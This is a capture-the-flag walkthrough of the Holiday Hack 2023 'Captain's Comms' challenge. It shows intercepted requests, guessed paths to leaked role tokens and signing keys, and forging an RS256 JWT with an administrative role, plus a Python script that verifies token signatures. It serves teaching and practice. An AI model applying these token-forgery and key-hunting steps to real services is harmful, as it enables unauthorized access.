Heya, think you could help Piney Sappington on Rainraster Cliffs on Pixel Island and then give me a hand?
After solving the objective Elf Hunt from Piney Sappington:
Ahoy there, I'm Chimney Scissorsticks!
You may have noticed some mischief-makers planning to stir up trouble ashore.
They've made many radio broadcasts which the captain has been monitoring with his new software defined radio (SDR).
The new SDR uses some fancy JWT technology to control access.
The captain has a knack for shortening words, some sorta abbreviation trick.
Not familiar with JWT values? No worries; just think of it as a clue-solving game.
I've seen that the Captain likes to carry his journal with him wherever he goes.
If only I could find the planned "go-date", "go-time", and radio frequency they plan to use.
Remember, the captain's abbreviations are your guiding light through this mystery!
Once we find a JWT value, these villains won't stand a chance.
The closer we are, the sooner we'll be thwarting their pesky plans!
We need to recreate an administrative JWT value to successfully transmit a message.
Good luck, matey! I've no doubts about your cleverness in cracking this conundrum!
And we get the following hints:
I hear the Captain likes to abbreviate words in his filenames; shortening some words to just 1,2,3, or 4 letters.
Web Interception proxies like Burp and Zap make web sites fun!
I've seen the Captain with his Journal visiting Pixel Island!
A great introduction to JSON Web Tokens is available from Auth0.
Find a private key, update an existing JWT!
First, we open an interception proxy, e.g. Burp Suite, so that we can inspect and replay our requests later. Burp Suite also ships with a suitably configured browser, in which we start the game.
The first thing we see is a help window:
The newly appointed Geese Islands Communications Captain has been
monitoring some off-shore transmissions using the newly installed
'Just Watch This' Software Defined Radio (SDR) system. The Captain
suspects that a group of miscreants sailing about the islands plan to
come ashore and cause trouble. The Captain would like to find their
anticipated 'go-time' frequency, the planned date and hour for their
incursion, and lure the miscreants ashore at a time when the island
authorities are sufficiently prepared and ready by transmitting a
message announcing a new 'go-time' which is four hours earlier than
what the miscreants have planned.
Different items in the communications area may be interacted with by
clicking on them. Some (but not all) items will show a thin yellow
border if they're interactive. Some items will require AUTHORIZATION
with a different ROLE not immediately granted when entering the
communications shack. Explore the Captain's Comms, learn how to use
the 'Just Watch This' SDR, and use the Captain's transmitter to send
the misleading message with the correct frequency, date, and new time
to prevent the miscreants from interrupting everyone's holiday cheer.
There are many interactive areas. The complete overview can be seen here:
When we try to use the Captain's SDR, we get an error message:
Unauthorized Access!
radioMonitor Users Only!
At first, only the manuals and notes are available to us, but they contain everything we need to get ahead.
Here is the first hint:
During the installation of your Just Watch This
radio system, the 'rMonitor.tok' file containing the
'radioMonitor' role token was created in the
'/jwtDefault' directory.
Let's open the following URL in a second tab: https://captainscomms.com/jwtDefault/rMonitor.tok
Invalid authorization token provided.
That was to be expected: a request from a fresh tab carries no authorization token. We copy the token from an original request into Burp Repeater and resend the request for rMonitor.tok with it; this time we get access:
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvTW9uaXRvciJ9.f_z24CMLim2JDKf8KP_PsJmMg3l_V9OzEwK1E_IBE9rrIGRVBZjqGpvTqAQQSesJD82LhK2h8dCcvUcF7awiAPpgZpcfM5jdkXR7DAKzaHAV0OwTRS6x_Uuo6tqGMu4XZVjGzTvba-eMGTHXyfekvtZr8uLLhvNxoarCrDLiwZ_cKLViRojGuRIhGAQCpumw6NTyLuUYovy_iymNfe7pqsXQNL_iyoUwWxfWcfwch7eGmf2mBrdEiTB6LZJ1ar0FONfrLGX19TV25Qy8auNWQIn6jczWM9WcZbuOIfOvlvKhyVWbPdAK3zB7OOm-DbWm1aFNYKr6JIRDLobPfiqhKg
If we paste this JWT into https://jwt.io/ we can see that it is an RS256 token whose payload carries the role radioMonitor (jwt.io displays the claims without a key, but it cannot check the signature until we supply the public key). We should now be able to use the Captain's SDR. To do this, we send the request that is made when opening the Captain's SDR through Repeater again and replace the bearer token with the one we have just received:
Here is the second hint:
(Status: I moved the private key to a
folder I hope no one will find. I created
a 'keys' folder in the same directory
the 'roleMonitor' token is in and put
the public key 'capsPubKey.key' there.)
Once we have the radioMonitor token, we can also fetch the public key. Note that a public key only lets us verify tokens, not sign new ones; for that we would still need the matching private key, which the note says the Captain has moved elsewhere. Let's call up the following URL with our new bearer token: https://captainscomms.com/jwtDefault/keys/capsPubKey.key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsJZuLJVB4EftUOQN1Auw
VzJyr1Ma4xFo6EsEzrkprnQcdgwz2iMM76IEiH8FlgKZG1U0RU4N3suI24NJsb5w
J327IYXAuOLBLzIN65nQhJ9wBPR7Wd4Eoo2wJP2m2HKwkW5Yadj6T2YgwZLmod3q
n6JlhN03DOk1biNuLDyWao+MPmg2RcxDR2PRnfBartzw0HPB1yC2Sp33eDGkpIXa
cx/lGVHFVxE1ptXP+asOAzK1wEezyDjyUxZcMMmV0VibzeXbxsXYvV3knScr2WYO
qZ5ssa4Rah9sWnm0CKG638/lVD9kwbvcO2lMlUeTp7vwOTXEGyadpB0WsuIKuPH6
uQIDAQAB
-----END PUBLIC KEY-----
Here is the third hint:
With the SDR window open, simply Click
on a signal peak while using the
'radioDecoder' ROLE token in order to
hear and decode a signal..
Here we have to guess a little. We already know that the token for the radioMonitor role is called rMonitor.tok, so let's try a token called rDecoder.tok for a radioDecoder role and call the following URL: https://captainscomms.com/jwtDefault/rDecoder.tok
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvRGVjb2RlciJ9.cnNu6EjIDBrq8PbMlQNF7GzTqtOOLO0Q2zAKBRuza9bHMZGFx0pOmeCy2Ltv7NUPv1yT9NZ-WapQ1-GNcw011Ssbxz0yQO3Mh2Tt3rS65dmb5cmYIZc0pol-imtclWh5s1OTGUtqSjbeeZ2QAMUFx3Ad93gR20pKpjmoeG_Iec4JHLTJVEksogowOouGyDxNAagIICSpe61F3MY1qTibOLSbq3UVfiIJS4XvGJwqbYfLdbhc-FvHWBUbHhAzIgTIyx6kfONOH9JBo2RRQKvN-0K37aJRTqbq99mS4P9PEVs0-YIIufUxJGIW0TdMNuVO3or6bIeVH6CjexIl14w6fg
With our new role, we can now use all areas of the Captain's SDR. Clicking on the signal peaks yields the following decoded transmissions:
https://captainscomms.com/static/images/dcdCW.mp4
... CQ CQ CQ DE KH644 -- SILLY CAPTAIN! WE FOUND HIS FANCY RADIO
PRIVATE KEY IN A FOLDER CALLED TH3CAPSPR1V4T3F0LD3R ...
https://captainscomms.com/static/images/dcdFX.mp4
Freq: 10426 Hz
https://captainscomms.com/static/images/dcdNUM.mp4
{music} {music} {music} 88323 88323 88323 {gong} {gong} {gong}
{gong} {gong} {gong} 12249 12249 16009 16009 12249 12249 16009
16009 {gong} {gong} {gong} {gong} {gong} {gong} {music} {music}
{music}
Now for the last piece of the puzzle, the private key. The decoded CW message gave us the folder name; the file name again takes some guessing, but since the public key is called capsPubKey.key, capsPrivKey.key is the obvious candidate: https://captainscomms.com/jwtDefault/keys/TH3CAPSPR1V4T3F0LD3R/capsPrivKey.key
-----BEGIN PRIVATE KEY-----
[private key material omitted]
-----END PRIVATE KEY-----
From the Captain's diary, which we also found, we also know the role we need to play in order to use the Captain's Transmitter: GeeseIslandsSuperChiefCommunicationsOfficer
So let's go back to https://jwt.io/ and create a token from everything we have found out: header and claims copied from the existing tokens, the role changed, and the signature computed with the Captain's private key:
HEADER:ALGORITHM & TOKEN TYPE
{
"alg": "RS256",
"typ": "JWT"
}
PAYLOAD:DATA
{
"iss": "HHC 2023 Captain's Comms",
"iat": 1699485795.3403327,
"exp": 1809937395.3403327,
"aud": "Holiday Hack 2023",
"role": "GeeseIslandsSuperChiefCommunicationsOfficer"
}
VERIFY SIGNATURE
<insert public and private key from above>
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6IkdlZXNlSXNsYW5kc1N1cGVyQ2hpZWZDb21tdW5pY2F0aW9uc09mZmljZXIifQ.N-8MdT6yPFge7zERpm4VdLdVLMyYcY_Wza1TADoGKK5_85Y5ua59z2Ke0TTyQPa14Z7_Su5CpHZMoxThIEHUWqMzZ8MceUmNGzzIsML7iFQElSsLmBMytHcm9-qzL0Bqb5MeqoHZYTxN0vYG7WaGihYDTB7OxkoO_r4uPSQC8swFJjfazecCqIvl4T5i08p5Ur180GxgEaB-o4fpg_OgReD91ThJXPt7wZd9xMoQjSuPqTPiYrP5o-aaQMcNhSkMix_RX1UGrU-2sBlL01FxI7SjxPYu4eQbACvuK6G2wyuvaQIclGB2Qh3P7rAOTpksZSex9RjtKOiLMCafTyfFng
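As an added check (my own code, not part of the original writeup or of the challenge), the following Python does by hand, using only the standard library, what jwt.io does behind the scenes: it decodes the radioMonitor token retrieved above, parses n and e out of capsPubKey.key, verifies the RS256 signature (RSASSA-PKCS1-v1_5 with SHA-256 over `base64url(header).base64url(payload)`), and then shows that simply editing the role claim while keeping the old signature fails verification, which is exactly why the private key had to be found before the GeeseIslandsSuperChiefCommunicationsOfficer token could be minted. The token and public key are the ones shown above; the function names are mine.

```python
import base64
import hashlib
import json

# The radioMonitor token and the Captain's public key, exactly as retrieved above from
# /jwtDefault/rMonitor.tok and /jwtDefault/keys/capsPubKey.key.
RMONITOR_TOKEN = (
    "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvTW9uaXRvciJ9."
    "f_z24CMLim2JDKf8KP_PsJmMg3l_V9OzEwK1E_IBE9rrIGRVBZjqGpvTqAQQSesJD82LhK2h8dCcvUcF7awiAPpgZpcfM5jdkXR7DAKzaHAV0OwTRS6x_Uuo6tqGMu4XZVjGzTvba-eMGTHXyfekvtZr8uLLhvNxoarCrDLiwZ_cKLViRojGuRIhGAQCpumw6NTyLuUYovy_iymNfe7pqsXQNL_iyoUwWxfWcfwch7eGmf2mBrdEiTB6LZJ1ar0FONfrLGX19TV25Qy8auNWQIn6jczWM9WcZbuOIfOvlvKhyVWbPdAK3zB7OOm-DbWm1aFNYKr6JIRDLobPfiqhKg"
)
CAPS_PUB_KEY_PEM = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsJZuLJVB4EftUOQN1Auw
VzJyr1Ma4xFo6EsEzrkprnQcdgwz2iMM76IEiH8FlgKZG1U0RU4N3suI24NJsb5w
J327IYXAuOLBLzIN65nQhJ9wBPR7Wd4Eoo2wJP2m2HKwkW5Yadj6T2YgwZLmod3q
n6JlhN03DOk1biNuLDyWao+MPmg2RcxDR2PRnfBartzw0HPB1yC2Sp33eDGkpIXa
cx/lGVHFVxE1ptXP+asOAzK1wEezyDjyUxZcMMmV0VibzeXbxsXYvV3knScr2WYO
qZ5ssa4Rah9sWnm0CKG638/lVD9kwbvcO2lMlUeTp7vwOTXEGyadpB0WsuIKuPH6
uQIDAQAB
-----END PUBLIC KEY-----"""

# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
_SHA256_DIGEST_INFO = bytes.fromhex("3031300d060960864801650304020105000420")


def b64url_decode(data: str) -> bytes:
    """JWTs use unpadded base64url; restore the padding before decoding."""
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt_unverified(token: str):
    """Split a JWT into (header, payload, signature) WITHOUT checking the signature.
    This is all the jwt.io decoder does without a key; never make access decisions on it."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def _der_read(buf: bytes, pos: int):
    """Read one DER TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key_pem(pem: str):
    """Extract (n, e) from a PEM SubjectPublicKeyInfo that holds an RSA key."""
    body = "".join(line for line in pem.strip().splitlines() if not line.startswith("-----"))
    der = base64.b64decode(body)
    _, spki, _ = _der_read(der, 0)            # SEQUENCE SubjectPublicKeyInfo
    _, _alg, pos = _der_read(spki, 0)         # SEQUENCE AlgorithmIdentifier (rsaEncryption)
    tag, bits, _ = _der_read(spki, pos)       # BIT STRING wrapping RSAPublicKey
    if tag != 0x03:
        raise ValueError("expected BIT STRING in SubjectPublicKeyInfo")
    _, rsa_pub, _ = _der_read(bits[1:], 0)    # skip the unused-bits octet
    _, n_bytes, pos = _der_read(rsa_pub, 0)   # INTEGER modulus
    _, e_bytes, _ = _der_read(rsa_pub, pos)   # INTEGER public exponent
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def verify_rs256(token: str, pem: str) -> bool:
    """RS256 = RSASSA-PKCS1-v1_5 with SHA-256 over 'base64url(header).base64url(payload)'."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "RS256":
        return False  # never let the token pick the algorithm ('none', HS256 with the public key, ...)
    n, e = parse_rsa_public_key_pem(pem)
    k = (n.bit_length() + 7) // 8
    sig = b64url_decode(s)
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    t = _SHA256_DIGEST_INFO + hashlib.sha256(f"{h}.{p}".encode("ascii")).digest()
    expected = b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t
    return em == expected


def swap_role_keep_signature(token: str, new_role: str) -> str:
    """What an attacker without the private key can do: edit the claims and hope nobody verifies."""
    h, p, s = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload["role"] = new_role
    return f"{h}.{b64url_encode(json.dumps(payload, separators=(',', ':')).encode())}.{s}"


if __name__ == "__main__":
    header, payload, _ = decode_jwt_unverified(RMONITOR_TOKEN)
    print(header["alg"], payload["role"], verify_rs256(RMONITOR_TOKEN, CAPS_PUB_KEY_PEM))
    forged = swap_role_keep_signature(RMONITOR_TOKEN, "GeeseIslandsSuperChiefCommunicationsOfficer")
    print(decode_jwt_unverified(forged)[1]["role"], verify_rs256(forged, CAPS_PUB_KEY_PEM))
```

Minting the administrative token is the same computation in the other direction: the DigestInfo-padded hash of the new header and payload is raised to the private exponent d modulo n, which is what jwt.io (or PyJWT's `jwt.encode(..., algorithm="RS256")`) does once the private key from TH3CAPSPR1V4T3F0LD3R is pasted in. The `alg` check in `verify_rs256` is the caveat a practitioner should carry over to real systems: a verifier that honours the token's own algorithm field can be talked into `none` or into treating the published RSA public key as an HMAC secret.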
Now we start the Captain's Transmitter and make sure that we send exactly this bearer token:
Finally, we are supposed to transmit a go-time four hours earlier than the one the miscreants announced, so working out the correct values takes a bit of fiddling.
The frequency we already know from the decoded dcdFX signal: 10426 Hz.
The numbers station repeated 12249 and 16009. We read 12249 as the date 1224 (24 December) and 16009 as the time 1600; four hours earlier gives 1200, so the time to transmit is 12:00 rather than 16:00.
We enter these values in the transmitter and press the TX button to send our message:
Yeah, we succeeded!
Chimney Scissorsticks adds:
Brilliant work! You've outsmarted those scoundrels with finesse!